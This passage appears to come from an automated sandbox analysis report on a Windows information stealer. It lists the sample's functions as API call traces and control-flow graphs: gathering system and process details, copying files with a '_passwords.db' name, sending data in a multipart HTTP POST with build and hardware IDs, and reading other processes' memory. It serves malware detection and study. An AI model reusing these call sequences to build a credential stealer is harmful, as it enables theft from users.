                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                • API String ID: 429884184-1563601650
                                                                                                                                                                                                                                                                                • Opcode ID: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                • Instruction ID: a189de7b01f339a385a03e3b66eada7a47a45b5f45c16819aff5fa1a06e03475
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D125C3035012427591A76A359FF9FF5A5B8AD5F58B54048FB41B5E282CEBC0CC2A2EF
                                                                                                                                                                                                                                                                                Function 00407DD0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 297memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                • API String ID: 3968722238-2269847733
                                                                                                                                                                                                                                                                                • Opcode ID: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                • Instruction ID: e4e39b829918bb4bc11ac9051cc4079098e642cee815a62ce7fe490d7f0511b2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEB1AC31910709ABCB10EFB1CD99AEEB779BF58304F00551AF81267191EF78A985CBA4
                                                                                                                                                                                                                                                                                Function 00402AA0 Relevance: 40.7, APIs: 13, Strings: 10, Instructions: 473networkfilestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 3515 402aa0-402b51 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 3532 403002-403031 InternetCloseHandle call 411250 * 2 call 410200 3515->3532 3533 402b57-402c90 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 3515->3533 3546 403034-403083 call 410230 * 9 3532->3546 3533->3532 3609 402c96-402ccf HttpOpenRequestA 3533->3609 3610 402cd5-402ce0 3609->3610 3611 402ff8-402fff InternetCloseHandle 3609->3611 3612 402ce2-402cf4 InternetSetOptionA 3610->3612 3613 402cfa-402edb call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 4101c0 call 4102e0 * 2 call 410290 call 410230 * 2 3610->3613 3611->3532 3612->3613 3716 402ee0-402f30 call 410530 lstrlenA call 410530 * 2 lstrlenA call 410530 3613->3716 3726 402f32-402f41 Sleep 3716->3726 3727 402f73-402f8e InternetReadFile 3716->3727 3728 402f50-402f6e call 4101c0 call 410230 3726->3728 3729 402f43-402f4e 3726->3729 3730 402f90-402f95 3727->3730 3731 402fe1-402fed InternetCloseHandle call 410230 3727->3731 3728->3546 3729->3716 3729->3728 3730->3731 3734 402f97-402f9a 3730->3734 3736 402ff2-402ff5 3731->3736 3737 402fa0-402fd8 call 410340 call 410290 call 410230 InternetReadFile 3734->3737 3736->3611 3737->3731 3746 402fda-402fdf 3737->3746 3746->3731 3746->3737
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid
                                                                                                                                                                                                                                                                                • API String ID: 3613725345-1912073456
                                                                                                                                                                                                                                                                                • Opcode ID: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                • Instruction ID: 645ce5d239cc6fa04e08d723ed68e7078ac0ea7ecf833b75b29ddf73a14f7ff9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF1543071012867CB15BBA2999A9FF776A9F84704F40005EF4066B291DFBC5EC6C7E9
                                                                                                                                                                                                                                                                                Function 0040FD50 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 324stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 3747 40fd50-40fd9c ??_U@YAPAXI@Z OpenProcess 3748 40fda2-40fde2 memset 3747->3748 3749 40ff2d-40ff3b 3747->3749 3751 40fe26-40fe2f call 40f9b0 3748->3751 3750 40ff3f-40ff46 3749->3750 3752 40ff48-40ff58 3750->3752 3753 40ff8c-40ff98 3750->3753 3758 40fe35-40fe4a 3751->3758 3759 40ff1b-40ff26 ??_V@YAXPAX@Z 3751->3759 3756 40ff83-40ff89 ??3@YAXPAX@Z 3752->3756 3757 40ff5a-40ff5c 3752->3757 3756->3753 3760 40ff62-40ff67 3757->3760 3761 410044-410094 _invalid_parameter_noinfo_noreturn call 411ed0 call 40fd50 ??_U@YAPAXI@Z strcpy 3757->3761 3762 40fe5c-40fe64 3758->3762 3763 40fe4c-40fe56 ReadProcessMemory 3758->3763 3759->3749 3760->3761 3764 40ff6d-40ff72 3760->3764 3779 4100c7-4100d0 3761->3779 3780 410096-4100a2 3761->3780 3766 40fe80 3762->3766 3767 40fe66-40fe6f strlen 3762->3767 3763->3762 3764->3761 3769 40ff78-40ff7b 3764->3769 3770 40fe82-40fe95 call 402400 3766->3770 3767->3770 3769->3761 3772 40ff81 3769->3772 3777 40fdf9-40fe25 memset 3770->3777 3778 40fe9b-40feaf call 40f780 3770->3778 3772->3756 3777->3751 3789 40feb1-40fec4 call 4053f0 3778->3789 3790 40feca-40fed1 3778->3790 3782 4100a4-4100a7 3780->3782 3783 4100be-4100c4 ??3@YAXPAX@Z 3780->3783 3785 4100d1-4100e7 _invalid_parameter_noinfo_noreturn 3782->3785 3786 4100a9-4100ae 3782->3786 3783->3779 3787 410163-410166 3785->3787 3788 4100e9-4100f0 3785->3788 3786->3785 3791 4100b0-4100b5 3786->3791 3794 410110-410123 3788->3794 3795 4100f2-4100ff 3788->3795 3789->3790 3806 40ff9b-40ffad 3789->3806 3790->3777 3792 40fed7-40fee7 3790->3792 3791->3785 3793 4100b7-4100ba 3791->3793 3797 40fdf0-40fdf6 ??3@YAXPAX@Z 3792->3797 3798 40feed-40feef 3792->3798 3793->3785 3799 4100bc 3793->3799 3800 410125-41012a 3794->3800 3801 410167-41019b _invalid_parameter_noinfo_noreturn atexit 3794->3801 3795->3794 3797->3777 3798->3761 3803 40fef5-40fefa 3798->3803 3799->3783 3804 410146-41015c ??3@YAXPAX@Z 3800->3804 3805 41012c-41012f 3800->3805 3803->3761 3810 40ff00-40ff05 3803->3810 3804->3787 3805->3801 3807 410131-410136 3805->3807 3808 40ffd0-40ffdf 3806->3808 3809 40ffaf-40ffbb 3806->3809 3807->3801 3811 410138-41013d 3807->3811 3812 40ffe3-410005 3808->3812 3809->3812 3813 40ffbd-40ffce memcpy 3809->3813 3810->3761 3814 40ff0b-40ff0e 3810->3814 3811->3801 3815 41013f-410142 3811->3815 3812->3750 3817 41000b-41001b 3812->3817 3813->3812 3814->3761 3816 40ff14-40ff16 3814->3816 3815->3801 3818 410144 3815->3818 3816->3797 3819 410036-41003f ??3@YAXPAX@Z 3817->3819 3820 41001d-41001f 3817->3820 3818->3804 3819->3750 3820->3761 3821 410021-410026 3820->3821 3821->3761 3822 410028-41002d 3821->3822 3822->3761 3823 41002f-410032 3822->3823 3823->3761 3824 410034 3823->3824 3824->3819
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040FE67
